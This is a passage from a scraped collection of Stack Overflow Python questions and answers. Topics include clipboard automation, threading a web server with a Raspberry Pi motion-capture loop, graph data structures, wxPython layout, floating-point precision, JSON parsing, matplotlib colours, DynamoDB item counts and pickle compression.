a=commands.getoutput("echo \""+applicant+"\" | xclip -verbose -selection clipboard")
b=commands.getoutput("echo \""+state+"\" | xclip -verbose -selection clipboard")
c=commands.getoutput("echo \""+sid+"\" | xclip -verbose -selection clipboard")
d=commands.getoutput("echo \""+profile+"\" | xclip -verbose -selection clipboard")
e=commands.getoutput("echo \""+sec+"\" | xclip -verbose -selection clipboard")
print "Applicant : "+applicant+"\nState : "+state+"\nStaff ID : "+sid+"\nProfile : "+profile+"\nSEC : "+sec+"\n"
prev=len(instant)
else:
whcount=whcount+1
print "While Loop Count : "+str(whcount)+"\n"
os.system("sleep 2")
One thing I forgot: this program always runs in the background and the terminal
window is minimised, so we have to catch key presses across the whole X session
and GUI apps. Whenever Ctrl+V is triggered in any application we should detect
that. Thanks in advance.
Answer: Ok, so, here is how this goes:
import time,os,win32api
from msvcrt import getch
def addToClipBoard(text):
command = 'echo ' + text.strip() + '| clip'
os.system(command)
def testpress(key):
return (win32api.GetKeyState(key) & (1 << 7)) != 0
key = 17 #ctrl key
key2= ord('V')
copy=1
while True:
keydown = testpress(key)
key2down = testpress(key2)
if keydown and key2down:
print 'CtrlV pressed!'
if copy==1:
addToClipBoard('Foo')
elif copy==2:
addToClipBoard('Shoo')
elif copy==3:
addToClipBoard('THA END')
if copy>3:
exit(1)
copy+=1
time.sleep(0.10)
I got the code for testing the keypress using win32api from another answer,
then put it all together to do what you wanted it to :)
|
Run server alongside infinite loop in Python
Question: I have the following code:
#!/usr/bin/python
import StringIO
import subprocess
import os
import time
from datetime import datetime
from PIL import Image
# Original code written by brainflakes and modified to exit
# image scanning for loop as soon as the sensitivity value is exceeded.
# this can speed taking of larger photo if motion detected early in scan
# Motion detection settings:
# need future changes to read values dynamically via command line parameter or xml file
# --------------------------
# Threshold - (how much a pixel has to change by to be marked as "changed")
# Sensitivity - (how many changed pixels before capturing an image) needs to be higher if noisy view
# ForceCapture - (whether to force an image to be captured every forceCaptureTime seconds)
# filepath - location of folder to save photos
# filenamePrefix - string that prefixes the file name for easier identification of files.
threshold = 10
sensitivity = 180
forceCapture = True
forceCaptureTime = 60 * 60 # Once an hour
filepath = "/home/pi/camera"
filenamePrefix = "capture"
# File photo size settings
saveWidth = 1280
saveHeight = 960
diskSpaceToReserve = 40 * 1024 * 1024 # Keep 40 mb free on disk
# Capture a small test image (for motion detection)
def captureTestImage():
command = "raspistill -w %s -h %s -t 500 -e bmp -o -" % (100, 75)
imageData = StringIO.StringIO()
imageData.write(subprocess.check_output(command, shell=True))
imageData.seek(0)
im = Image.open(imageData)
buffer = im.load()
imageData.close()
return im, buffer
# Save a full size image to disk
def saveImage(width, height, diskSpaceToReserve):
keepDiskSpaceFree(diskSpaceToReserve)
time = datetime.now()
filename = filepath + "/" + filenamePrefix + "-%04d%02d%02d-%02d%02d%02d.jpg" % ( time.year, time.month, time.day, time.hour, time.minute, time.second)
subprocess.call("raspistill -w 1296 -h 972 -t 1000 -e jpg -q 15 -o %s" % filename, shell=True)
print "Captured %s" % filename
# Keep free space above given level
def keepDiskSpaceFree(bytesToReserve):
if (getFreeSpace() < bytesToReserve):
for filename in sorted(os.listdir(filepath + "/")):
if filename.startswith(filenamePrefix) and filename.endswith(".jpg"):
os.remove(filepath + "/" + filename)
print "Deleted %s to avoid filling disk" % filename
if (getFreeSpace() > bytesToReserve):
return
# Get available disk space
def getFreeSpace():
st = os.statvfs(".")
du = st.f_bavail * st.f_frsize
return du
# Get first image
image1, buffer1 = captureTestImage()
# Reset last capture time
lastCapture = time.time()
# added this to give visual feedback of camera motion capture activity. Can be removed as required
os.system('clear')
print " Motion Detection Started"
print " ------------------------"
print "Pixel Threshold (How much) = " + str(threshold)
print "Sensitivity (changed Pixels) = " + str(sensitivity)
print "File Path for Image Save = " + filepath
print "---------- Motion Capture File Activity --------------"
while (True):
# Get comparison image
image2, buffer2 = captureTestImage()
# Count changed pixels
changedPixels = 0
for x in xrange(0, 100):
# Scan one line of image then check sensitivity for movement
for y in xrange(0, 75):
# Just check green channel as it's the highest quality channel
pixdiff = abs(buffer1[x,y][1] - buffer2[x,y][1])
if pixdiff > threshold:
changedPixels += 1
# Changed logic - If movement sensitivity exceeded then
# Save image and Exit before full image scan complete
if changedPixels > sensitivity:
lastCapture = time.time()
saveImage(saveWidth, saveHeight, diskSpaceToReserve)
break
continue
# Check force capture
if forceCapture:
if time.time() - lastCapture > forceCaptureTime:
changedPixels = sensitivity + 1
# Swap comparison buffers
image1 = image2
buffer1 = buffer2
This code takes a picture once movement is detected, and keeps doing so until
I manually stop it. (I should mention that the code is for use with the
Raspberry Pi computer)
I also have the following code courtesy of Nathan Jhaveri here on
Stackoverflow:
import SocketServer
from BaseHTTPServer import BaseHTTPRequestHandler
def some_function():
print "some_function got called"
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/captureImage':
saveImage(saveWidth, saveHeight, diskSpaceToReserve)
self.send_response(200)
httpd = SocketServer.TCPServer(("", 8080), MyHandler)
httpd.serve_forever()
This code runs a simple server that would execute the
saveImage(saveWidth, saveHeight, diskSpaceToReserve)
function when the url /captureImage is visited on the server. I have run into
a problem with this though. Since the two pieces of code are both infinite
loops, they cannot run side by side. I would assume I need to do some kind of
multi-threading, but that is something I have never experimented with in
Python before. I would appreciate if anyone could help me get back on track
with this.
Answer: This isn't a small question. Your best bet is to work through some python
threading tutorials such as this one:
<http://www.tutorialspoint.com/python/python_multithreading.htm> (found via
google)
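To sketch the idea for this particular case: the HTTP server can run in a daemon
thread while the motion detection stays in the main thread. This assumes the
existing `while (True):` block is wrapped in a function; I call it `motion_loop()`
here, which is my name, not something in your code:
    import threading
    import SocketServer
    from BaseHTTPServer import BaseHTTPRequestHandler
    class MyHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path == '/captureImage':
                saveImage(saveWidth, saveHeight, diskSpaceToReserve)
                self.send_response(200)
    httpd = SocketServer.TCPServer(("", 8080), MyHandler)
    # daemon=True means the server thread dies when the main program exits
    server_thread = threading.Thread(target=httpd.serve_forever)
    server_thread.daemon = True
    server_thread.start()
    motion_loop()  # the existing motion-detection while-loop, running in the main thread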
|
Representing graphs (data structure) in Python
Question: How can one neatly represent a
[graph](https://en.wikipedia.org/wiki/Graph_%28data_structure%29) in
[Python](https://en.wikipedia.org/wiki/Python_\(programming_language\))?
(Starting from scratch i.e. no libraries!)
What data structure (e.g. dicts/tuples/dict(tuples)) will be fast but also
memory efficient?
One must be able to do various graph
[operations](https://en.wikipedia.org/wiki/Graph_%28data_structure%29#Operations)
on it.
As pointed out, the various [graph
representations](https://en.wikipedia.org/wiki/Graph_\(abstract_data_type\)#Representations)
might help. How does one go about implementing them in Python?
As for the libraries, [this
question](http://stackoverflow.com/questions/606516/python-graph-library) has
quite good answers.
Thanks!
Answer: Even though this is a somewhat old question, I thought I'd give a practical
answer for anyone stumbling across this.
Let's say you get your input data for your connections as a list of tuples
like so:
[('A', 'B'), ('B', 'C'), ('B', 'D'), ('C', 'D'), ('E', 'F'), ('F', 'C')]
The data structure I've found to be most useful and efficient for graphs in
Python is a **dict of sets**. This will be the underlying structure for our
`Graph` class. You also have to know if these connections are arcs (directed,
connect one way) or edges (undirected, connect both ways). We'll handle that
by adding a `directed` parameter to the `Graph.__init__` method. We'll also
add some other helpful methods.
from collections import defaultdict
class Graph(object):
""" Graph data structure, undirected by default. """
def __init__(self, connections, directed=False):
self._graph = defaultdict(set)
self._directed = directed
self.add_connections(connections)
def add_connections(self, connections):
""" Add connections (list of tuple pairs) to graph """
for node1, node2 in connections:
self.add(node1, node2)
def add(self, node1, node2):
""" Add connection between node1 and node2 """
self._graph[node1].add(node2)
if not self._directed:
self._graph[node2].add(node1)
def remove(self, node):
""" Remove all references to node """
for n, cxns in self._graph.iteritems():
try:
cxns.remove(node)
except KeyError:
pass
try:
del self._graph[node]
except KeyError:
pass
def is_connected(self, node1, node2):
""" Is node1 directly connected to node2 """
return node1 in self._graph and node2 in self._graph[node1]
def find_path(self, node1, node2, path=[]):
""" Find any path between node1 and node2 (may not be shortest) """
path = path + [node1]
if node1 == node2:
return path
if node1 not in self._graph:
return None
for node in self._graph[node1]:
if node not in path:
new_path = self.find_path(node, node2, path)
if new_path:
return new_path
return None
def __str__(self):
return '{}({})'.format(self.__class__.__name__, dict(self._graph))
I'll leave it as an "exercise for the reader" to create a `find_shortest_path`
and other methods.
Let's see this in action though...
>>> connections = [('A', 'B'), ('B', 'C'), ('B', 'D'),
('C', 'D'), ('E', 'F'), ('F', 'C')]
>>> g = Graph(connections, directed=True)
>>> pprint(g._graph)
{'A': {'B'},
'B': {'D', 'C'},
'C': {'D'},
'E': {'F'},
'F': {'C'}}
>>> g = Graph(connections) # undirected
>>> pprint(g._graph)
{'A': {'B'},
'B': {'D', 'A', 'C'},
'C': {'D', 'F', 'B'},
'D': {'C', 'B'},
'E': {'F'},
'F': {'E', 'C'}}
>>> g.add('E', 'D')
>>> pprint(g._graph)
{'A': {'B'},
'B': {'D', 'A', 'C'},
'C': {'D', 'F', 'B'},
'D': {'C', 'E', 'B'},
'E': {'D', 'F'},
'F': {'E', 'C'}}
>>> g.remove('A')
>>> pprint(g._graph)
{'B': {'D', 'C'},
'C': {'D', 'F', 'B'},
'D': {'C', 'E', 'B'},
'E': {'D', 'F'},
'F': {'E', 'C'}}
>>> g.add('G', 'B')
>>> pprint(g._graph)
{'B': {'D', 'G', 'C'},
'C': {'D', 'F', 'B'},
'D': {'C', 'E', 'B'},
'E': {'D', 'F'},
'F': {'E', 'C'},
'G': {'B'}}
>>> g.find_path('G', 'E')
['G', 'B', 'D', 'C', 'F', 'E']
|
WxPython widget misplaced after hide() & show()
Question: I'm trying to build a GUI for a school project on Boolean expression
evaluation. The program takes a string such as `A^B` as input and shows its truth
table in the GUI with a Grid widget.
For various reasons (I don't want to make this post too long) I need to Hide() and
Show() a panel with the only widget it has (the grid), but whenever I call
Hide() and Show() the panel is placed in the top-left corner of the parent
panel.
Let me clarify using some pictures:
The panel that I want to hide is the gray one just below the disabled TextCtrl
widget and, as you can see, I placed it where I wanted to. Now let's see after
hide() and show()

Now the panel has been moved to the upper left corner of the screen.
This is how I'm implementing the panel:
#Answer box panel
self.panel_resp = sp.ScrolledPanel(midPan, -1) # midpan is the parent panel (blue)
self.panel_resp.SetBackgroundColour('#FFFFFFF')
resp_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.panel_resp.SetSizer(resp_sizer)
self.panel_resp.SetAutoLayout(1)
self.panel_resp.SetupScrolling()
self.vbox1.Add(self.panel_resp, flag=wx.EXPAND|wx.ALL,
border=10)
self.vbox1.Add((-1,10))
self.panel_resp.Hide()
Now, whenever I click the 'Evaluar' button, I make the following statement:
`self.panel_resp.Show()`
And the panel shows up in that corner.
Any idea on why is this happening?
I didn't want to fill this post with my code since it's quite huge but I'll
gladly answer any questions about it, I just posted that part since I think
that's the only important one.
Answer: I think Show() just makes hidden components visible; it does not re-run the
layout. Assuming self.vbox1 is the sizer for midPan, try calling
`self.vbox1.Layout()` manually after showing the panel to tell the sizer to put
everything back in the right spot.
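A minimal sketch of what the button handler might look like (assuming, as in the
question, that `self.vbox1` is the sizer holding `panel_resp`; the handler name is
made up here):

    def on_evaluar(self, event):
        self.panel_resp.Show()
        self.vbox1.Layout()  # re-run the sizer so the panel returns to its slot
        # self.panel_resp.SetupScrolling()  # possibly needed again for the ScrolledPanel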
|
Enthought Canopy - passing sys.argv from PySide Qt program
Question: I've recently been looking at the Enthought distro of iPython. Today I decided
to see if I could get some Qt GUI progs running and was successful after
making minor changes. Simple example:
import sys
from PySide import QtGui # was 'from PyQT4 import QtGui'
# app = QtGui.QApplication(sys.argv) -- not needed
win = QtGui.QWidget()
win.resize(320, 240)
win.setWindowTitle("Hello MIT 6X!")
win.show()
sys.exit() # was 'sys.exit(app.exec_())'
But I would like to be able to pass `sys.argv` in some cases. Most example
code I see is in the form of the commented out `'app = '` line above. If I
include it, I get
> 'RuntimeError: A QApplication instance already exists.'
Suggestions for passing arguments appreciated.
Answer: Two separate issues:
1) Passing command line arguments: As you have probably noticed, when you do
the "Run" command from the Canopy editor, all it does is issue the IPython
%run magic command. You can type the same command in the IPython shell, plus
command line parameters, which your program will see. Or to save keystrokes,
do this auto-generated Run command once, then press Up Arrow in the IPython
shell to recall that auto-generated %run command, then enter your parameters
after the filename, and then press Enter. You'll end up with an IPython magic
command like this:
%run pathtoprog/myprogrampy p1 p2 p3
We (Enthought) are considering adding a setting for command-line parameters so
that you could do "Run with parameters" and have the best of both worlds.
2) Existing QApplication: By default, Canopy's IPython is running in IPython's
interactive Pylab mode, with a Qt backend. If you don't want this, you can
just disable Pylab mode in the Canopy Preferences/Python menu, or change the
Pylab mode to Inline (for matplotlib) instead of Interactive.
For maximum flexibility, with a bit more work, you could (as matplotlib does)
introduce logic which checks whether a QApplication already exists, use it if
it exists and create it if it does not.
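A small sketch of that check — `QApplication.instance()` returns the running
application or None, so the same script works both inside Canopy's interactive Qt
session and standalone:

    import sys
    from PySide import QtGui

    app = QtGui.QApplication.instance()     # reuse the one IPython/Canopy created
    if app is None:
        app = QtGui.QApplication(sys.argv)  # or create our own when run standalone

    win = QtGui.QWidget()
    win.resize(320, 240)
    win.show()

(When run as a normal standalone script you would still finish with
`sys.exit(app.exec_())`; inside Canopy's interactive Qt event loop you would not.)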
|
How to avoid floating point errors?
Question: I was trying to write a function to approximate square roots (I know there's
the math module...I want to do it myself), and I was getting screwed over by
the floating point arithmetic. How can you avoid that?
def sqrt(num):
root = 0.0
while root * root < num:
root += 0.01
return root
Using this has these results:
>>> sqrt(4)
2.0000000000000013
>>> sqrt(9)
3.00999999999998
I realize I could just use `round()`, but I want to be able to make this
really accurate. I want to be able to calculate out to 6 or 7 digits. That
wouldn't be possible if I'm rounding. I want to understand how to properly
handle floating point calculations in Python.
Answer: This really has nothing to do with Python - you'd see the same behavior in any
language using your hardware's binary floating-point arithmetic. First [read
the docs](http://docs.python.org/2/tutorial/floatingpoint.html).
After you read that, you'll better understand that you're _not_ adding one
one-hundredth in your code. This is exactly what you're adding:
>>> from decimal import Decimal
>>> Decimal(.01)
Decimal('0.01000000000000000020816681711721685132943093776702880859375')
That string shows the exact decimal value of the binary floating ("double
precision" in C) approximation to the exact decimal value 0.01. The thing
you're really adding is a little bigger than 1/100.
Controlling floating-point numeric errors is the field called "numerical
analysis", and is a very large and complex topic. So long as you're startled
by the fact that floats are just approximations to decimal values, use the
`decimal` module. That will take away a world of "shallow" problems for you.
For example, given this small modification to your function:
from decimal import Decimal as D
def sqrt(num):
root = D(0)
while root * root < num:
root += D("0.01")
return root
then:
>>> sqrt(4)
Decimal('2.00')
>>> sqrt(9)
Decimal('3.00')
It's not really more accurate, but may be less surprising in simple examples
because now it's adding _exactly_ one one-hundredth.
An alternative is to stick to floats and add something that _is_ exactly
representable as a binary float: values of the form `I/2**J`. For example,
instead of adding 0.01, add 0.125 (1/8) or 0.0625 (1/16).
Then look up "Newton's method" for computing square roots ;-)
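A rough sketch of Newton's method with plain floats (the starting guess and the
absolute tolerance here are arbitrary choices; for very large inputs a relative
tolerance would be safer):

    def newton_sqrt(num, tolerance=1e-12):
        guess = num / 2.0 or 1.0          # crude starting point (1.0 if num is 0)
        while abs(guess * guess - num) > tolerance:
            guess = (guess + num / guess) / 2.0
        return guess

    # newton_sqrt(9) gives a value within the tolerance of 3.0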
|
python pattern identifier? regex?
Question: So what I need is to identify the pattern " X" or "spaceCAPITAL" examples:
string="Hello World, This is KZ"
And the program would pick out:
example_list = [W,T,K]
Answer:
>>> import re
>>> strs = "Hello World, This is KZ"
>>> re.findall(r'\s([A-Z])', strs)
['W', 'T', 'K']
|
Compiling and Executing Java file in python
Question: How can I open a Java file in Python? I've searched over the net and found
this:
import os.path, subprocess
from subprocess import STDOUT, PIPE
def compile_java (java_file):
subprocess.check_call(['javac', java_file])
def execute_java (java_file):
cmd=['java', java_file]
proc=subprocess.Popen(cmd, stdout = PIPE, stderr = STDOUT)
input = subprocess.Popen(cmd, stdin = PIPE)
print(proc.stdout.read())
compile_java("CsMain.java")
execute_java("CsMain")
but then I got this error:
Traceback (most recent call last):
File "C:\Python33\lib\subprocess.py", line 1106, in _execute_child
startupinfo)
FileNotFoundError: [WinError 2] The system cannot find the file specified
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\casestudy\opener.py", line 13, in <module>
compile_java("CsMain.java")
File "C:\casestudy\opener.py", line 5, in compile_java
subprocess.check_call(['javac', java_file])
File "C:\Python33\lib\subprocess.py", line 539, in check_call
retcode = call(*popenargs, **kwargs)
File "C:\Python33\lib\subprocess.py", line 520, in call
with Popen(*popenargs, **kwargs) as p:
File "C:\Python33\lib\subprocess.py", line 820, in __init__
restore_signals, start_new_session)
File "C:\Python33\lib\subprocess.py", line 1112, in _execute_child
raise WindowsError(*e.args)
FileNotFoundError: [WinError 2] The system cannot find the file specified
>>>
The Python file and the Java file are in the same folder, and I am using Python
3.3.2. How can I resolve this? Or do you guys have another way of doing this?
Any answer is appreciated, thanks!
Answer: I think it isn't recognizing the `javac` command. Try manually running the
command and if `javac` isn't a recognized command, register it in your `PATH`
variable and try again.
Or you could just try typing the full pathname to the Java directory for
`javac` and `java`.
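For example, a sketch of the second option — the JDK path below is only a
placeholder, use wherever your JDK is actually installed:

    import subprocess

    JDK_BIN = r'C:\Program Files\Java\jdk1.7.0_25\bin'   # hypothetical install path

    subprocess.check_call([JDK_BIN + r'\javac.exe', 'CsMain.java'])
    output = subprocess.check_output([JDK_BIN + r'\java.exe', 'CsMain'])
    print(output)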
|
questions regarding Python namespaces and using import
Question: I'm playing around with Python today and trying out creating my own modules.
It seems I don't fully understand Python namespaces and I wonder if anyone
could answer my questions about them.
Here is an example of what I've done:
I've created a module named mytest with the following structure:
mytest/
....setup.py
....bin/
....docs/
....mytest/
........__init__.py
........test.py
....tests/
test.py contains one method as follows:
def say_hello():
print "Hello"
I've installed mytest via distutils. Using 'pip list' I can see the module is
installed.
All OK so far, but now I want to use it. I created a test script
moduletest.py:
from mytest import test
test.say_hello()
and running this works fine, the 'Hello' message is printed. I was happy with
this and started playing around with other methods of importing the module.
The following all seem to work OK:
from mytest.test import say_hello
say_hello()
And:
import mytest.test as test
test.say_hello()
But, the following will not work:
import mytest
test.say_hello()
And:
import mytest
mytest.test.say_hello()
And:
import mytest.test
test.say_hello()
Can anyone explain why you can't import the whole mytest module and then use
the parts you want, or why you have to alias test (import mytest.test as test)
in order to access it instead of just importing mytest.test (import
mytest.test)?
I guess my understanding is a bit off, but some explanation would really help.
Thanks!
Answer: When you do:
import mytest.test
It's adding `mytest.test` to the global namespace, not `test`. So what you
could do is:
import mytest.test
mytest.test.say_hello()
If you want to just use the line `import mytest`, what you need to do is edit
your `__init__.py` file in your `mytest` directory to say:
import mytest.test
Then you can do this:
import mytest
mytest.test.say_hello()
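Equivalently — and without the package importing itself by its absolute name — the
package's `__init__.py` can use an explicit relative import, e.g.:

    # mytest/__init__.py
    from . import test

After that, `import mytest` followed by `mytest.test.say_hello()` works the same way.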
|
Load multiple dictionaries from a file
Question: I have a file that looks like this:
{"cid" : "160686859281645","name" : "","s" : "JBLU131116P00011000","e" : "OPRA","p" : "-","c" : "-","b" : "3.60","a" : "3.80","oi" : "0","vol" : "-","strike" : "11.00","expiry" : "Nov 16, 2013"};
{"cid" : "721018656376031","name" : "","s" : "JBLU131116P00012000","e" : "OPRA","p" : "-","c" : "-","b" : "4.60","a" : "4.80","oi" : "0","vol" : "-","strike" : "12.00","expiry" : "Nov 16, 2013"};
How can I load these lines into Python so I can access the `key:value` pairs?
Answer: Those look like JSON serialized objects (apart from the trailing `;`).
Assuming that they are one per line, you can load them with:
import json
yourData = []
with open("fileName.txt") as inputData:
for line in inputData:
try:
yourData.append(json.loads(line.rstrip(';\n')))
except ValueError:
print "Skipping invalid line {0}".format(repr(line))
print yourData
If the JSON objects are not all one per line, you can read until you find a
`;` (outside a string literal) and process that with the same logic above,
instead of reading one line at a time. If the file is small, you could even
read it all in memory and split it.
Here we go:
>>> import json
>>>
>>> yourData = []
>>> with open("fileName.txt") as inputData:
... for line in inputData:
... try:
... yourData.append(json.loads(line.rstrip(';\n')))
... except ValueError:
... print "Skipping invalid line {0}".format(repr(line))
...
Skipping invalid line '\n'
>>> print yourData
[{u'a': u'3.80', u'c': u'-', u'b': u'3.60', u'e': u'OPRA', u'name': u'', u'oi': u'0', u'cid': u'160686859281645', u'vol': u'-', u'expiry': u'Nov 16, 2013', u'p': u'-', u's': u'JBLU131116P00011000', u'strike': u'11.00'}, {u'a': u'4.80', u'c': u'-', u'b': u'4.60', u'e': u'OPRA', u'name': u'', u'oi': u'0', u'cid': u'721018656376031', u'vol': u'-', u'expiry': u'Nov 16, 2013', u'p': u'-', u's': u'JBLU131116P00012000', u'strike': u'12.00'}]
>>>
>>> import pprint
>>> pprint.pprint(yourData
... )
[{u'a': u'3.80',
u'b': u'3.60',
u'c': u'-',
u'cid': u'160686859281645',
u'e': u'OPRA',
u'expiry': u'Nov 16, 2013',
u'name': u'',
u'oi': u'0',
u'p': u'-',
u's': u'JBLU131116P00011000',
u'strike': u'11.00',
u'vol': u'-'},
{u'a': u'4.80',
u'b': u'4.60',
u'c': u'-',
u'cid': u'721018656376031',
u'e': u'OPRA',
u'expiry': u'Nov 16, 2013',
u'name': u'',
u'oi': u'0',
u'p': u'-',
u's': u'JBLU131116P00012000',
u'strike': u'12.00',
u'vol': u'-'}]
|
How to extract string between selected string in python
Question: If I have a string like:
str = 'Hello, <code>This is the string i want to extract</code>'
Then how will I extract the string that is between `<code>` and `</code>`? In
the above case the extracted string is:
'This is the string i want to extract'
I want to use this string in django filter.
Answer: Use a parser such as `BeautifulSoup`:
>>> from bs4 import BeautifulSoup as BS
>>> text = 'Hello, <code>This is the string i want to extract</code>'
>>> soup = BS(text)
>>> print soup.code.text
This is the string i want to extract
Or you can just use regex if it's just one line:
>>> import re
>>> re.search(r'<code>(.*?)</code>', text).group(1)
'This is the string i want to extract'
* * *
By the way, please don't name strings `str`. It will override the built-in
type.
|
Plot lines in different colors from color dictionary in Python
Question: I'm trying to plot the path of 15 different storms on a map in 15 different
colors. The color of the path should depend on the name of the storm. For
example if the storm's name is AUDREY, the color of the storm's path should be
red on the map. Could someone please help/point me in the right direction?
Here's the part of my code:
import numpy as np
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import csv, os, scipy
import pandas
from PIL import *
data = np.loadtxt('louisianastormb.csv',dtype=np.str,delimiter=',',skiprows=1)
'''print data'''
fig = plt.figure(figsize=(12,12))
ax = fig.add_axes([0.1,0.1,0.8,0.8])
m = Basemap(llcrnrlon=-100.,llcrnrlat=0.,urcrnrlon=-20.,urcrnrlat=57.,
projection='lcc',lat_1=20.,lat_2=40.,lon_0=-60.,
resolution ='l',area_thresh=1000.)
m.bluemarble()
m.drawcoastlines(linewidth=0.5)
m.drawcountries(linewidth=0.5)
m.drawstates(linewidth=0.5)
# Creates parallels and meridians
m.drawparallels(np.arange(10.,35.,5.),labels=[1,0,0,1])
m.drawmeridians(np.arange(-120.,-80.,5.),labels=[1,0,0,1])
m.drawmapboundary(fill_color='aqua')
color_dict = {'AUDREY': 'red', 'ETHEL': 'white', 'BETSY': 'yellow','CAMILLE': 'blue', 'CARMEN': 'green',
'BABE': 'purple', 'BOB': '#ff69b4', 'FREDERIC': 'black', 'ELENA': 'cyan', 'JUAN': 'magenta', 'FLORENCE': '#faebd7',
'ANDREW': '#2e8b57', 'GEORGES': '#eeefff', 'ISIDORE': '#da70d6', 'IVAN': '#ff7f50', 'CINDY': '#cd853f',
'DENNIS': '#bc8f8f', 'RITA': '#5f9ea0', 'IDA': '#daa520'}
# Opens data file witn numpy
'''data = np.loadtxt('louisianastormb.csv',dtype=np.str,delimiter=',',skiprows=0)'''
'''print data'''
colnames = ['Year','Name','Type','Latitude','Longitude']
data = pandas.read_csv('louisianastormb.csv', names=colnames)
names = list(data.Name)
lat = list(data.Latitude)
long = list(data.Longitude)
colorName = list(data.Name)
#print lat
#print long
lat.pop(0)
long.pop(0)
latitude= map(float, lat)
longitude = map(float, long)
x, y = m(latitude,longitude)
#Plots points on map
for colorName in color_dict.keys():
plt.plot(x,y,'-',label=colorName,color=color_dict[colorName], linewidth=2 )
lg = plt.legend()
lg.get_frame().set_facecolor('grey')
plt.title('20 Hurricanes with Landfall in Louisiana')
#plt.show()
plt.savefig('20hurpaths1.jpg', dpi=100)
Here's the error message that I keep getting is:
Traceback (most recent call last):
File "/home/mikey1/lstorms.py", line 51, in <module>
plt.plot(x,y,'y-',color=colors[names], linewidth=2 )
TypeError: unhashable type: 'list'
>>>
Answer: You're accessing the dictionary entries incorrectly. First off you do
`names = list(data.Name)`, so `names` is of type `list`. Then you index the
dictionary like this: `color_dict[names]`. The problem is not setting the
colour but how you try to access the dictionary (a `list` is not a valid key).
Change it to something like:
for colourName in color_dict.keys():
plt.plot(x,y,'y-',color=color_dict[colourName], linewidth=2 ) # You need to use different data for the data series here.
And it'll work.
Also, your error message reads `plt.plot(x,y,'y-',color=colors[names],
linewidth=2 )` but in your code you've got `color=colors_dict[names]`. Are you
sure you posted the right code?
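To actually get one coloured track per storm you also need to split the data per
storm. A rough sketch, assuming the CSV has been loaded into the pandas DataFrame
`data` from the question (with the header row dropped) and noting that Basemap
expects longitude first, then latitude:

    for name, track in data.groupby('Name'):
        lons = [float(v) for v in track.Longitude]
        lats = [float(v) for v in track.Latitude]
        x, y = m(lons, lats)
        plt.plot(x, y, '-', label=name,
                 color=color_dict.get(name, 'white'), linewidth=2)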
|
How to determine vCenter Server from a HostSystem object?
Question: I am querying ESX hosts, some of which are managed by a vCenter server, and
some are not. I want to find out the name of the vCenter server that manages
this host, if there is one.
I'm using the Python psphere module, but all I want is the types of objects
and attributes I should be looking in. This is the relevant excerpt from my
code:
from psphere.client import Client
import psphere.managedobjects
items = []
cl = Client( hostname, userid, password )
dcs = psphere.managedobjects.Datacenter.all( cl )
I identify an ESX host vs. a vCenter server by checking the datacenters list:
if len( dcs ) == 1 and dcs[0].name == 'ha-datacenter':
hosts = psphere.managedobjects.HostSystem.all( cl )
Typically, hosts above will be a list of one element: the ESX host. I want to
know how to find out if there is a managing vCenter server for this host. The
vSphere client does it, so there must be a way.
else: # This is a vCenter server, so we can drill down to find the ESX servers
for dc in dcs:
items.extend( getEntities( dc, [hostname] ) )
getEntities() is my own function for collecting details about hosts and
vCenter servers.
Answer: I found the following property within the `HostSystem` object:
`.summary.managementServerIp`. Not all `HostSystem` objects will have this
property, so I check for it as follows:
host = ... a HostSystem object, acquired as described in the question ...
if 'managementServerIp' in host.summary:
... do something with the management server IP address ...
|
Incorrect value from dynamodb table description and scan count
Question: I'm having a problem with dynamodb. I'm attempting to verify the data
contained within, but scan seems to be only returning a subset of the data,
here is the code I'm using with the python boto bindings
#!/usr/bin/python
#Check the scanned length of a table against the Table Description
import boto.dynamodb
#Connect
TABLENAME = "MyTableName"
sdbconn = boto.dynamodb.connect_to_region(
"eu-west-1",
aws_access_key_id='-snipped-',
aws_secret_access_key='-snipped-')
#Initial Scan
results = sdbconn.layer1.scan(TABLENAME,count=True)
previouskey = results['LastEvaluatedKey']
#Create Counting Variable
count = results['Count']
#DynamoDB scan results are limited to 1MB but return a Key value to carry on for the next MB
#so loop untill it does not return a continuation point
while previouskey != False:
results = sdbconn.layer1.scan(TABLENAME,exclusive_start_key=previouskey,count=True)
print(count)
count = count + results['Count']
try:
#get next key
previouskey = results['LastEvaluatedKey']
except:
#no key returned so thats all folks!
print(previouskey)
print("Reached End")
previouskey = False
#these presumably should match, they dont on the MyTableName Table, not even close
print(sdbconn.describe_table(TABLENAME)['Table']['ItemCount'])
print(count)
`print(sdbconn.describe_table)` gives me 1748175 and `print(count)` gives me
583021. I was under the impression that these should always match (I'm aware
of the 6-hour update); only 300 rows have been added in the last 24 hours
though. Does anyone know if this is an issue with DynamoDB, or does my code
have a wrong assumption?
Answer: Figured it out finally: it's to do with Local Secondary Indexes. They show up
in the table description as unique items; the table has two LSIs, causing it
to show 3x the number of items actually present.
|
isinstance(foo, types.GeneratorType) or inspect.isgenerator(foo)?
Question: It seems that there are two ways in Python to test whether an object is a
generator:
import types
isinstance(foo, types.GeneratorType)
or:
import inspect
inspect.isgenerator(foo)
In the spirit of "There should be one-- and preferably only one --obvious way
to do it.", is one of these ways recommended over the other (presumably they
do the same thing...if not, please enlighten me!)?
Answer: They are 100% equivalent:
>>> print(inspect.getsource(inspect.isgenerator))
def isgenerator(object):
"""Return true if the object is a generator.
Generator objects provide these attributes:
        __iter__ defined to support iteration over container
close raises a new GeneratorExit exception inside the
generator to terminate the iteration
gi_code code object
gi_frame frame object or possibly None once the generator has
been exhausted
gi_running set to 1 when generator is executing, 0 otherwise
next return the next item from the container
send resumes the generator and "sends" a value that becomes
the result of the current yield-expression
throw used to raise an exception inside the generator"""
return isinstance(object, types.GeneratorType)
I'd say that using `isinstance(object, types.GeneratorType)` should be the
preferred way since it's clearer and simpler. Also `inspect.isgenerator` was
only added in python2.6, which means that using `isinstance` is more backward
compatible.
They probably added the `isgenerator` function for symmetry with
[`isgeneratorfunction`](http://docs.python.org/2/library/inspect.html#inspect.isgeneratorfunction),
which does something different.
|
Compress Python Object in Memory
Question: Most tutorials on compressing a file in Python involve immediately writing
that file to disk with no intervening compressed python object. I want to know
how to pickle and then compress a python object in memory without ever writing
to or reading from disk.
Answer: I use this to save memory in one place:
import cPickle
import zlib
# Compress:
compressed = zlib.compress(cPickle.dumps(obj))
# Get it back:
obj = cPickle.loads(zlib.decompress(compressed))
If `obj` has references to a number of small objects, this can reduce the
amount of memory used by a lot. A lot of small objects in Python add up
